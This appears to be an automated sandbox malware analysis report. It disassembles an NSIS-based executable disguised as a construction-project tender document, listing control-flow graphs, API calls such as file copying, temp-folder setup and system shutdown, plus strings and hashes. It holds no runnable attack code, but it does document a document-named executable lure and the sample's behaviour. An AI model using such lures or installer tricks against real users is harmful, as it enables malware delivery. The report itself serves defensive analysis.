                                                                                                                          control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062f6 SHGetFileInfoW call 405f8c GetCommandLineW call 405f8c GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 405a04 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 18 403432-403436 14->18 19 40342c-403431 14->19 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 21 4034f7-403506 call 405a04 18->21 22 40343c-403442 18->22 19->18 21->11 40 403508-403509 21->40 26 403444-40344b 22->26 27 40345c-403495 22->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 33 403452 26->33 34 40344d-403450 26->34 28 4034b2-4034ec 27->28 29 403497-40349c 27->29 37 4034f4-4034f6 28->37 38 4034ee-4034f2 28->38 29->28 35 40349e-4034a6 29->35 33->27 34->27 34->33 41 4034a8-4034ab 35->41 42 4034ad 35->42 37->21 38->37 44 403518-403525 call 405f8c 38->44 40->11 41->28 41->42 42->28 43->24 43->45 44->16 58 403772-403778 45->58 59 40367c-40368c call 405768 ExitProcess 45->59 50 403657-40365e call 40391f 46->50 51 4035c8-4035d3 call 405a04 46->51 57 403663 50->57 62 403621-40362b 51->62 63 4035d5-40360a 51->63 57->45 60 403815-40381d 58->60 61 40377e-40379b call 4062f6 * 3 58->61 70 403823-403827 ExitProcess 60->70 71 40381f 60->71 93 4037e5-4037f3 call 4062f6 61->93 94 40379d-40379f 61->94 67 403692-4036ac lstrcatW lstrcmpiW 62->67 68 40362d-40363b call 405adf 62->68 66 40360c-403610 63->66 73 403612-403617 66->73 74 403619-40361d 66->74 67->45 76 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 67->76 68->45 83 40363d-403653 call 405f8c * 2 68->83 71->70 73->74 78 40361f 73->78 74->66 74->78 80 4036d1-4036fa call 405f8c 76->80 81 4036c6-4036cc call 405f8c 76->81 78->62 91 4036ff-40371b call 405fae DeleteFileW 80->91 81->80 83->50 100 40375c-403764 91->100 101 40371d-40372d CopyFileW 91->101 105 403801-40380c ExitWindowsEx 93->105 106 4037f5-4037ff 93->106 94->93 98 4037a1-4037a3 94->98 98->93 103 4037a5-4037b7 GetCurrentProcess 98->103 100->91 107 403766-40376d call 405e26 100->107 101->100 104 40372f-40374f call 405e26 call 405fae call 405703 101->104 103->93 115 4037b9-4037db 103->115 104->100 122 403751-403758 CloseHandle 104->122 105->60 109 40380e-403810 call 40140b 105->109 106->105 106->109 107->45 109->60 115->93 122->100
                                                                                                                          APIs
                                                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",00000000), ref: 004033DB
                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",?), ref: 00403403
                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                                                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",00000000,?), ref: 00403698
                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",00000000,?), ref: 004036A4
                                                                                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                                                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,0041FEA8,00000001), ref: 00403725
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$C:\Users\user\AppData\Roaming\incontemptible\koput\Losser$C:\Users\user\Desktop$C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                          • API String ID: 4107622049-1309350060
                                                                                                                          • Opcode ID: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                                                                                          • Instruction ID: 3f9bff4532b5a1f920197c5518436c484d8c06ab90e6dd2e991860da6f926746
                                                                                                                          • Opcode Fuzzy Hash: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                                                                                          • Instruction Fuzzy Hash: 1FC11770604210AAD720BF659D45A2B3EACEB45749F10483FF940B62D2D77D9D41CB7E
                                                                                                                          Function 00405373 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 123 405373-40538e 124 405394-40545b GetDlgItem * 3 call 4041cf call 404ad1 GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 40551d-405524 123->125 143 405479-40547c 124->143 144 40545d-405477 SendMessageW * 2 124->144 126 405526-405548 GetDlgItem CreateThread CloseHandle 125->126 127 40554e-40555b 125->127 126->127 130 405579-405583 127->130 131 40555d-405563 127->131 135 405585-40558b 130->135 136 4055d9-4055dd 130->136 133 405565-405574 ShowWindow * 2 call 4041cf 131->133 134 40559e-4055a7 call 404201 131->134 133->130 147 4055ac-4055b0 134->147 140 4055b3-4055c3 ShowWindow 135->140 141 40558d-405599 call 404173 135->141 136->134 138 4055df-4055e5 136->138 138->134 145 4055e7-4055fa SendMessageW 138->145 148 4055d3-4055d4 call 404173 140->148 149 4055c5-4055ce call 405234 140->149 141->134 151 40548c-4054a3 call 40419a 143->151 152 40547e-40548a SendMessageW 143->152 144->143 153 405600-40562b CreatePopupMenu call 405fae AppendMenuW 145->153 154 4056fc-4056fe 145->154 148->136 149->148 162 4054a5-4054b9 ShowWindow 151->162 163 4054d9-4054fa GetDlgItem SendMessageW 151->163 152->151 160 405640-405655 TrackPopupMenu 153->160 161 40562d-40563d GetWindowRect 153->161 154->147 160->154 164 40565b-405672 160->164 161->160 165 4054c8 162->165 166 4054bb-4054c6 ShowWindow 162->166 163->154 167 405500-405518 SendMessageW * 2 163->167 168 405677-405692 SendMessageW 164->168 169 4054ce-4054d4 call 4041cf 165->169 166->169 167->154 168->168 170 405694-4056b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 4056b9-4056e0 SendMessageW 170->172 172->172 173 4056e2-4056f6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->154
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040541D
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004054C0
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405548
                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040556C
                                                                                                                          • ShowWindow.USER32(?,?), ref: 00405571
                                                                                                                          • ShowWindow.USER32(?), ref: 004055BB
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405600
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405634
                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040564D
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405695
                                                                                                                          • EmptyClipboard.USER32 ref: 0040569B
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                                                                                          • CloseClipboard.USER32 ref: 004056F6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {$&B
                                                                                                                          • API String ID: 590372296-2518801558
                                                                                                                          • Opcode ID: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                                                                                          • Instruction ID: 4bfa3faa41321a0cadf5913ced3eb51c87a7cc043350d2f69421d7beec3be44d
                                                                                                                          • Opcode Fuzzy Hash: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                                                                                          • Instruction Fuzzy Hash: 92B13971900208BFDB219F60DD89AAE7B79FB04354F00813AFA05BA1A0C7759E52DF69
                                                                                                                          Function 00405FAE Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 419 405fae-405fb9 420 405fbb-405fca 419->420 421 405fcc-405fe2 419->421 420->421 422 405fe8-405ff5 421->422 423 4061fa-406200 421->423 422->423 424 405ffb-406002 422->424 425 406206-406211 423->425 426 406007-406014 423->426 424->423 428 406213-406217 call 405f8c 425->428 429 40621c-40621d 425->429 426->425 427 40601a-406026 426->427 430 4061e7 427->430 431 40602c-406068 427->431 428->429 433 4061f5-4061f8 430->433 434 4061e9-4061f3 430->434 435 406188-40618c 431->435 436 40606e-406079 GetVersion 431->436 433->423 434->423 439 4061c1-4061c5 435->439 440 40618e-406192 435->440 437 406093 436->437 438 40607b-40607f 436->438 446 40609a-4060a1 437->446 438->437 443 406081-406085 438->443 441 4061d4-4061e5 lstrlenW 439->441 442 4061c7-4061cf call 405fae 439->442 444 4061a2-4061af call 405f8c 440->444 445 406194-4061a0 call 405ed3 440->445 441->423 442->441 443->437 448 406087-40608b 443->448 457 4061b4-4061bd 444->457 445->457 450 4060a3-4060a5 446->450 451 4060a6-4060a8 446->451 448->437 453 40608d-406091 448->453 450->451 455 4060e4-4060e7 451->455 456 4060aa-4060d0 call 405e59 451->456 453->446 458 4060f7-4060fa 455->458 459 4060e9-4060f5 GetSystemDirectoryW 455->459 468 4060d6-4060df call 405fae 456->468 469 40616f-406173 456->469 457->441 461 4061bf 457->461 463 406165-406167 458->463 464 4060fc-40610a GetWindowsDirectoryW 458->464 462 406169-40616d 459->462 466 406180-406186 call 406220 461->466 462->466 462->469 463->462 467 40610c-406116 463->467 464->463 466->441 474 406130-406146 SHGetSpecialFolderLocation 467->474 475 406118-40611b 467->475 468->462 469->466 472 406175-40617b lstrcatW 469->472 472->466 478 406161 474->478 479 406148-40615f SHGetPathFromIDListW CoTaskMemFree 474->479 475->474 477 40611d-406124 475->477 480 40612c-40612e 477->480 478->463 479->462 479->478 480->462 480->474
                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,?,0040526B,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 00406071
                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060EF
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406102
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 0040614C
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406157
                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,?,0040526B,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 004061D5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-1989025593
                                                                                                                          • Opcode ID: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                                                                                          • Instruction ID: 5cce0682863fafc60a16059ed1eb0c3d77be7ea2b31a2434558a531189329514
                                                                                                                          • Opcode Fuzzy Hash: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                                                                                          • Instruction Fuzzy Hash: EA61D271A00115AADF209F25CC40AAF37A5EF54314F12813FE906BA2D1D73D99A2CB5E
                                                                                                                          Function 00405814 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 481 405814-40583a call 405adf 484 405853-40585a 481->484 485 40583c-40584e DeleteFileW 481->485 487 40585c-40585e 484->487 488 40586d-40587d call 405f8c 484->488 486 4059d0-4059d4 485->486 489 405864-405867 487->489 490 40597e-405983 487->490 496 40588c-40588d call 405a23 488->496 497 40587f-40588a lstrcatW 488->497 489->488 489->490 490->486 493 405985-405988 490->493 494 405992-40599a call 4062cf 493->494 495 40598a-405990 493->495 494->486 505 40599c-4059b0 call 4059d7 call 4057cc 494->505 495->486 499 405892-405896 496->499 497->499 501 4058a2-4058a8 lstrcatW 499->501 502 405898-4058a0 499->502 504 4058ad-4058c9 lstrlenW FindFirstFileW 501->504 502->501 502->504 506 405973-405977 504->506 507 4058cf-4058d7 504->507 521 4059b2-4059b5 505->521 522 4059c8-4059cb call 405234 505->522 506->490 512 405979 506->512 509 4058f7-40590b call 405f8c 507->509 510 4058d9-4058e1 507->510 523 405922-40592d call 4057cc 509->523 524 40590d-405915 509->524 513 4058e3-4058eb 510->513 514 405956-405966 FindNextFileW 510->514 512->490 513->509 517 4058ed-4058f5 513->517 514->507 520 40596c-40596d FindClose 514->520 517->509 517->514 520->506 521->495 526 4059b7-4059c6 call 405234 call 405e26 521->526 522->486 532 40594e-405951 call 405234 523->532 533 40592f-405932 523->533 524->514 527 405917-405920 call 405814 524->527 526->486 527->514 532->514 536 405934-405944 call 405234 call 405e26 533->536 537 405946-40594c 533->537 536->514 537->514
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 0040583D
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405885
                                                                                                                          • lstrcatW.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004058A8
                                                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004058AE
                                                                                                                          • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004058BE
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040596D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbA563.tmp$\*.*
                                                                                                                          • API String ID: 2035342205-535719329
                                                                                                                          • Opcode ID: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                                                                                          • Instruction ID: 43b78ede77d9c0270a3625fa09dd856e9a99610c0d190015c3454e79d0f7c46c
                                                                                                                          • Opcode Fuzzy Hash: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                                                                                          • Instruction Fuzzy Hash: A541C171900A15E6CB217B61CC49BAF7678EF81768F20817BF801B61D1D77C49829EAE
                                                                                                                          Function 004062CF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(?,00425738,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00405B28,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 004062DA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062E6
                                                                                                                          Strings
                                                                                                                          • 8WB, xrefs: 004062D0
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsbA563.tmp, xrefs: 004062CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
